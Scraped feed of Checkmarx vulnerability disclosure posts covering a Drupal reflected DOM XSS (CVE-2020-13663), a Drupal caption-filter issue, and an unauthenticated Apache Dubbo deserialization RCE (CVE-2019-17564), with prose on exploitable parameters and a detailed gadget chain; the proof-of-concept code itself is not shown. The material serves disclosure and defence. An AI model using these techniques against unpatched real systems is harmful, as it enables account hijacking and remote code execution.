Unlike the previous issue disclosed (CVE-2020-13663), CVE-2020-13669 is actually two distinct vulnerable elements. The FigCaption widget, and Drupal widgets in general, are both client-side and server-side mechanisms, which requires both to behave identically on both client and server. Finally, the fixes for both of these mechanisms, while completely disparate, involved the same basic approach—applying the restrictive whitelists of Basic HTML mode to the whitelist within the image caption, so that attackers cannot access more HTML functionality and thus breach the HTML sandbox.

Recommendation Summary

The fixes for these issues have been released, and it is highly recommended for all organizations to update their Drupal Core to the latest available version.

Timeline of Disclosure

18-Jun-20 – Drupal Self-XSS reported, followed by HTML defacement injection, and XSS prevention bypass via broken widgets
16-Sep-20 – Drupal Core new sub-versions release across all major versions, mitigating CVE-2020-13669

Final Words

Drupal Core is a complicated piece of software with many content and system management features and a vast plugin ecosystem. It is no surprise that this complexity yields such vulnerabilities—particularly common web-vulnerabilities such as XSS.
To counterbalance this complexity, the Drupal Security Team takes a strong stance and ownership on securing open-source software. They are responsive, receptive, and thorough, which allows for both a quick and high-quality response to security issues being reported.
Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software. Checkmarx’s database of open source libraries and vulnerabilities is cultivated by the Checkmarx Security Research Team, empowering CxSCA with risk details, remediation guidance, and exclusive vulnerabilities that go beyond the NVD.

]]>
Drupal Core: Behind the Vulnerability https://checkmarx.com/blog/drupal-core-behind-the-vulnerability-part-1-reflected-xss/ Thu, 19 Nov 2020 07:59:34 +0000 https://www.checkmarx.com/?p=42557 Earlier this year, the Checkmarx Security Research Team conducted an investigation of the new version of Drupal Core (Drupal 9) – a content management system (CMS) written in PHP – uncovering several interesting issues whose technical details are worth discussing openly.
This article covers the technical facets of CVE-2020-13663 that were made public by Checkmarx in June 2020, but whose details were never discussed publicly, and serves as part 1 of breaking down the vulnerabilities identified during our Drupal research. The issues outlined below were resolved by the Drupal security team shortly after we reported them.

CVE-2020-13663 – Overview

Drupal Security Risk: Critical https://www.drupal.org/sa-core-2020-004
Vulnerable versions:

  • Drupal 7 – before 7.72
  • Drupal 8.8 – before 8.8.8
  • Drupal 8.9 – before 8.9.1
  • Drupal 9 – before 9.0.1

NOTE: This issue was also reported internally by Samuel Mortenson of the Drupal Security Team.

CVE-2020-13663 – Reflected DOM XSS in Rejected Forms

Vulnerability Proof of Concept (PoC)

The following code would recreate the issue on any vulnerable version of Drupal Core, so long as Basic Page functionality exists and URL rewrites are not altered. It will affect any user who is authenticated and has permissions to both add the page and use a Full HTML mode. Otherwise, values such as form “action” and form_id “value” may require alteration:

An authenticated user with HTML content creation permissions will observe the result of script execution:

While Cross-site Request Forgery (CSRF) mitigation prevents the form from going through and adding a new page, Drupal attempts to fail gracefully so that content that has been submitted is not lost because a security mechanism rejected it. A message is shown to indicate the form is rejected, but the user may still retrieve its contents from the form:

The posted content is reflected in the page to allow users to copy it to a valid form in a CKEditor view. The CKEditor view, like a Microsoft Word document, contains live elements such as images, figures, and more. These live elements are rendered HTML elements, which, in theory, could contain malicious code. While CKEditor does generally account for this by offering some protection against this type of DOM XSS and specifically strips script tags, the way it is configured on Drupal allows bypassing that by planting the script tags inside an iframe.

Vulnerability Breakdown

A reflected XSS vulnerability occurs when an attacker can provide values to a victim via a crafted URL or webpage, which, once interacted with by the victim, passes tainted parameters to a webpage in the user’s browser. If the user is authenticated, these scripts can then interact with the webpage from within the user’s browser, session context, and on the user’s behalf.
A DOM XSS implies the DOM itself, within the user’s browser, programmatically retrieves tainted values from within itself and populates the insecure page with these tainted values, essentially parsing HTML containing an XSS payload, or injecting Javascript into itself. Reflected XSS implies that the generated page contains user input from the request that prompted it. In this case, it is both:

User input is reflected in the expired form error page, and CKEditor then uses this payload to populate itself:

Note that this mutates the DOM somewhat; the script tag is removed from the iframe, and rendered right next to it.
The vulnerable forms here are the node/add/[type] and node/[node-id]/edit endpoints—when POSTing to these pages, with the correct parameters:

  • form_id parameter: e.g. node_article_form, node_page_form, which are the default form types
  • A parameter name to inject a value into: in both default cases here (“Article” and “Basic Page”), this is body[0][value], but generally, a CKEditor element can be derived from the field’s classes, e.g., text-formatted or field-type-text-with-summary to realize it is a component generated by CKEditor, and field-name-body to get the field’s name
  • Forcing format mode to “Full HTML” for the payload to trigger, e.g., body[0][format]; otherwise, this will simply be the current value, which could be restricted and block out the payload

Other variables for CSRF protection and expiry checks can be left out or left empty; the attacker cannot supply these, and when wrong or missing, will reflect the expired form and trigger the XSS.

  • Inject malicious code into webpages via Cross-Site Scripting to:
    • Hijack user accounts
    • Inject malicious web-content, such as malicious login or payment forms

Summary of Disclosure and Events

Once reported to the Drupal Security Team, they invited Checkmarx to their discussions on fixing these issues, and were very receptive to the report and subsequent analysis. The Drupal Security Team was quick to acknowledge the flaw and repair it.

Timeline of Disclosure

07-Jun-20 – Drupal Security Team notified of DOM XSS (CVE-2020-13663) via e-mail
09-Jun-20 – Drupal Security Team responds with invitation to consult on resolving this issue, as it was also internally identified by Samuel Mortenson of the Drupal Security Team
17-Jun-20 – Drupal Core new sub-versions release across all major version, mitigating CVE-2020-13663

]]>
Checkmarx Research: Apache Dubbo 2.7.3 – Unauthenticated RCE via Deserialization of Untrusted Data (CVE-2019-17564) https://checkmarx.com/blog/apache-dubbo-unauthenticated-remote-code-execution-vulnerability/ Wed, 19 Feb 2020 10:00:56 +0000 https://www.checkmarx.com/?p=30540 Executive Summary

Having developed a high level of interest in serialization attacks in recent years, I’ve decided to put some effort into researching Apache Dubbo some months back. Dubbo, I’ve learned, deserializes many things in many ways, and whose usage world-wide has grown significantly after its adoption by the Apache Foundation.

Figure 1 – Dubbo Architecture
According to a mid-2019 press-release, Dubbo is “in use at dozens of companies, including Alibaba Group, China Life, China Telecom, Dangdang, Didi Chuxing, Haier, and Industrial and Commercial Bank of China, among others”. In the same press-release, Apache announced Dubbo being promoted into an Apache Top-Level Project.


Figure 2 – Dubbo Users, According to Apache Dubbo Website
I discovered that Apache Dubbo providers and consumers using versions <= 2.7.3 of Dubbo, when configured to accept the HTTP protocol, allows a remote attacker to send a malicious object to the exposed service, which would result in Remote Code Execution. This occurs with no authentication, and minimal knowledge on an attacker’s part is required to exploit this vulnerability. Specifically, only the exploit described herein and a URL is required to successfully exploit it on any Dubbo instance with HTTP enabled. A proof of concept video also accompanies this report.
An attacker can exploit this vulnerability to compromise a Dubbo provider service, which is expecting remote connections from its consumers. An attacker can then replace the Dubbo provider with a malicious Dubbo provider, which could then respond to its consumers with a similar malicious object – again resulting in Remote Code Execution. This allows an attacker to compromise an entire Dubbo cluster.
The root cause for this issue is due to the use of a remote deserialization service in Spring Framework, whose documentation explicitly recommends not to use it with untrusted data, in-tandem with an outdated library, which contains a lesser-known gadget chain that enables code execution. A combination of unsafe deserialization of untrusted data, and a gadget chain, is what bridges the gap between remote access and remote unauthenticated code execution.
Credits are in order to Chris Frohoff and Moritz Bechler for their research and tools (ysoserial and marshalsec), as some of their code was used in the gadget chain, and their research laid the foundation for this exploit.

Severity

Checkmarx considers this vulnerability to have a CVS Score of 9.8 (Critical), since it is an unauthenticated remote code execution vulnerability that provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and accessiblity.
While not all Dubbo instances are configured to use the HTTP protocol, instances with known vulnerable versions that are configured to use this protocol would be trivially vulnerable, given minimal and readily available information, which is the URL to the vulnerable service. This service URL would be publically available within the network, via services such as a registry (e.g. Zookeeper), and is not considered secret or confidential.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:U/RC:C/CR:H/IR:H/AR:H

Specifications

What’s Going On?

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider’ instance of Apache Dubbo, if this instance enables HTTP.
The Dubbo HTTP instance attempts to deserialize data within the Java ObjectStream, which contains a malicious set of classes, colloquially referred to as a gadget chain, whose invocation results in the execution of malicious code. In this instance, the malicious code in question allows arbitrary OS commands, and the invocation of the gadget chain occurs when an internal toString call is made in the Dubbo instance on this gadget chain, during exception creation.

Recreating the Issue

An attacker can submit a POST request with a malicious object to a bean URL for an Apache Dubbo HTTP Service, which would result in remote code execution. The bean, in this case, is the interface implementation class bound by Spring to a given Dubbo protocol endpoint. The bean is wired to a URL, and the request body for the bean contains an HTTP Remote Invocation used to determine which bean method is invoked, and with what parameters.
Once an attacker has the bean’s URL, all they have to do to exploit this vulnerability is to submit a malicious gadget chain via a standard POST request.
A new gadget chain which allows remote OS command execution was found in the scope of vanilla Apache Dubbo with Dubbo-Remoting-HTTP, if the HTTP service and protocol are enabled.

Recreating a Victim Dubbo HTTP Instance for PoC

Follow this guide:

  1. Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created
  2. Enable Dubbo HTTP service – Edit dubbo-demo-provider.xml – change dubbo:protocol name to “http”

Targeting a Vulnerable Instance

To trigger this vulnerability, an attacker must identify a URL to the Dubbo HTTP bean. URL addresses are generally not confidential or privileged, since they can be obtained from Dubbo service registries (e.g., Zookeeper), multicasts, and, in the absence of a well-deployed HTTPS pipeline, allow Man-in-the-Middle attacks.

Triggering Vulnerability PoC

Review Appendix 1 for functioning POC code. Note that variables such as the IP address of the Dubbo instance require modification inside this code.
An attacker requires the same dependencies as the Dubbo HTTP Service, stated above. In this PoC, com.nqzero:permit-reflect for reflection features required during serialization, and org.apache.httpcomponents.httpclient was used to send the malicious gadget to the HTTP service. To trigger the vulnerability, a new gadget chain was engineered using means available within the class space of Apache Dubbo and JDK.
This gadget chain uses the following components:

  • springframework.remoting.httpinvoker.HttpInvokerServiceExporter – this is the deserialization entry point, deserializing the request body. Deserialization of HashMaps, and Java Collections in general, invokes their value insertion methods. In this case, this will invoke HashMap.putVal(h,k,v).
  • A HashMap of two org.springframework.aop.target.HotSwappableTargetSource objects, one containing a JSONObject as a target, and another containing a com.sun.org.apache.xpath.internal.objects.XString object as a target
    • HotSwappableTargetSource objects always return the same hashcode (class.hashCode()), which forces the HashMap.putVal(h,k,v) into running deeper equality checks on HashMap keys, trigger equals() on its contents – the two HotSwappableTargetSource member objects
    • HotSwappableTargetSource equality checks validate if the target objects inside HotSwappableTargetSource are equal; in this case – an XString and a JSONObject
    • The XString.equals(object) triggers a call equivalent to this.toString().equals(object.toString()) call, which would trigger JSONObject.toString()
  • JSONObject – org.apache.dubbo.common.json.JSONObject, which is a deprecated class within Dubbo, is used to handle JSON data. If a JSONObject.toString() is invoked, the super method JSON.toJSONString() will be invoked
    • A toJSONString() call will attempt to serialize the object into JSON using JSONSerializer, which invokes a serializer. This serializer is generated using the ASMSerializerFactory. This factory attempts to serialize all getter methods in objects stored inside JSONObject.
  • TemplatesImpl partial gadget – this known gadget is utilized by many gadget chains in ysoserial and marshalsec. This partial gadget generates a malicious com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl object. If this object’s newTransformer() method is invoked, the chain will execute java.lang.Runtime.getRuntime().exec(command)
    • Since JSONObject.toJSONString attempts to serialize all getter methods, the method TemplatesImpl.getOutputProperties() is also invoked
    • Internally, TemplatesImpl.getOutputProperties() method invokes newTransformer() to get the properties from a generated transformer


Figure 3 – Exploit Bytecode
Once newTransformer is invoked, a flow is complete between deserialization at HttpInvokerServiceExporter.doReadRemoteInvocation(ObjectInputStream ois) and java.lang.Runtime.getRuntime().exec(command), thus enabling remote code execution.
The final gadget chain’s structure is:

Once the vulnerability is triggered, and malicious code is executed (and, in the PoC, an instance of calc.exe pops on the server), an exception will be thrown. However, the application will continue to function as intended otherwise, resulting in stable exploitation for the given gadget chain.

Figure 4 – PoC Outcome

Why Is This Happening?

Apache Dubbo using HTTP remoting occurs when a Dubbo application is created using the HTTP protocol over the Spring framework. A combination of a known-vulnerable class in Spring being invoked naively by Dubbo deserializes user input using the extremely vulnerable (and nigh indefensible) ObjectInputStream. An attacker may provide a payload which, when deserialized, will trigger a cascade of objects and method invocations which, given a vulnerable gadget chain in deserialization scope, may result in Remote Code Execution, as will be demonstrated in this POC.
The vulnerable Spring Remoting class is HttpInvokerServiceExporter. From the Spring documentation:
WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.”
This is exactly what happens with Dubbo HTTP Remoting. By using the Dubbo HTTP remoting module, an HTTP endpoint is exposed that receives an HTTP request of the following structure:

  • A POST request
    • Whose URL refers to the packagename.classname for the bean exposed by the provider, which is wired by Dubbo to the actual package and class
    • Whose body is a stream of an object, as serialized by ObjectOutputStream

The HttpProtocol handler parses the incoming org.apache.dubbo.rpc.protocol.http.HttpRemoteInvocation object using the HttpInvokerServiceExporter, which, internally, utilizes ObjectInputStream to deserialize it. HttpRemoteInvocation contains an invocation call to a certain method, and the arguments to pass to this method. However, with ObjectInputStream, any arbitrary serialized Java object can be passed, which would then be deserialized in an insecure manner, resulting in unsafe deserialization.
ObjectInputStream, on its own without any external classes, is vulnerable to memory exhaustion and heap overflow attacks, when it is used to deserialize malformed nested objects.
If an ObjectInputStream deserializable gadget chain is available within code scope that allows code or command execution, an attacker can exploit this to craft an object that results in Remote Code Execution. Such a gadget chain was found and exploited.

Tainted Code Flow

Within the Dubbo HTTP service, the following occurs:

  1. JavaX HttpServlet is invoked with user input
  2. This input is passed to the Dubbo remoting dispatcher, DispatcherServlet, which uses an HttpHandler, an internal class in HttpProtocol, to handle the request and return a response
  3. InternalHandler.handle() creates the insecure HttpInvokerServiceExporter in line 210 and invokes it on the request in line 216
  4. From there, internal calls in HttpInvokerServiceExporter finally pass the request stream into an ObjectInputStream in line 115, which is then internally read by the handler’s superclass RemoteInvocationSerializingExporter in line 144.
  5. The gadget chain is then triggered by the ObjectInputStream readObject operation

Required Prior Knowledge for Exploitation

The only piece of knowledge required to exploit an open HTTP port to a Dubbo HTTP Remoting service is the name of a Remote Invocation interface’s package and class. This information is used to craft the URL to which a serialized malicious object must be submitted, which is standard Spring bean behavior. For example, if the remoted interface’s package is named “org.apache.dubbo.demo” and the interface being remoted is named “DemoService”, an attacker needs to POST an object serialized by ObjectOutputStream to the URL “https://domain:port/org.apache.dubbo.demo.DemoService”. This information can be obtained with various methods:

  • Querying a Zookeeper for available beans, if Dubbo uses a Zookeeper as a registry
  • Observing HTTP traffic via Man-in-the-Middle attacks
  • Spoofing is also likely to be possible if Dubbo uses a multicast to find services (this was not tested)
  • Other means, such as logging services

No additional information is required to perform the attack.
It should be noted that URL paths are generally not considered confidential information, and hiding a vulnerable web service behind an allegedly unknowable URL path would constitute security through obscurity.

Summary of Disclosure and Timeline

When the vulnerability was first discovered, the Checkmarx research team ensured that they could reproduce the process of easily exploiting it. Once that was confirmed, the research team responsibly notified Apache of their findings.

Disclosure Timeline

  • 13/8/2019 – Checkmarx provides full disclosure to security@apache.org, issue forwarded to security@dubbo.apache.org
  • 6/9/2019 – Acknowledgement by Apache, Dubbo team that issue is clear
  • 4/10/2019 – Dubbo team responds regarding technical specifics of intended fix. Checkmarx responds by further explaining the issue – this is the first and last time technical issues are brought up by anyone at Apache in the context of this disclosure
  • 24/11/2019 – Reminder sent after 90 days had elapsed and publication is imminent with no action on Apache’s part
  • 3/12/2019 – Apache had requested more time to re-evaluate this issue prior to Checkmarx report publishing. This request was granted, with Apache confirming two days later that a CVE will be issued and a proper fix will be released
  • 11/2/2020 – CVE-2019-17564 disclosed via dev@dubbo.apache.org mailing list, six months (180 days) after original disclosure
  • 12/2/2020 – first POC emerges in the wild, but it does not contain the new gadget chain disclosed in this article

Package Versions

org.apache.dubbo.dubbo – 2.7.3
org.apache.dubbo.dubbo-remoting-http – 2.7.3
org.springframework.spring-web – 5.1.9.RELEASE

Vendor Mitigation

The Apache Dubbo team has resolved this issue by updating FastJSON, which contains the latest version of JSONObject, to its latest version in the project dependencies. This effectively breaks the current chain. They have also replaced the deserialization mechanism used by the HTTP protocol, altering the communication protocol, ensuring this specific exploit will not work.

Conclusions

The Dubbo HTTP Remoting service is vulnerable to unauthenticated Remote Code Execution, with virtually no prior knowledge required, other than a URL, for successful exploitation.
The root cause of this issue is the usage of an unsafe Spring class, HttpInvokerServiceExporter, for binding an HTTP service to. This class utilizes a standard Java ObjectStream with no security mechanisms in the form of a class whitelist, which in turn means deserialization allows invocation of arbitrary classes whose deserialization process may trigger malicious code. Use of this class should be discontinued, and replaced with a robust solution that whitelists expected classes in Dubbo HTTP beans.
This type of research activity is part of the Checkmarx Security Research Team’s ongoing efforts to drive the necessary changes in software security practices among all organizations in an effort to improve security for everyone overall.

Appendix 1

Appendix 1A: DubboGadget Class

A class for attacking a Dubbo HTTP instance

Appendix 1B: Utils Class

Utility class, which includes utility methods, was used in the creation of certain parts of the malicious gadget chain and exposing certain functionality by streamlining reflections. It is derived largely from auxiliary classes and comfort methods in ysoserial by Chris Frohoff – https://github.com/frohoff/ysoserial. Additionally, the makeXStringToStringTrigger is derived from prior research by Moritz Bechler, demonstrated in https://github.com/mbechler/marshalsec



Appendix 1C: pom.xml File for DubboGadget

Maven dependencies for DubboGadget

]]>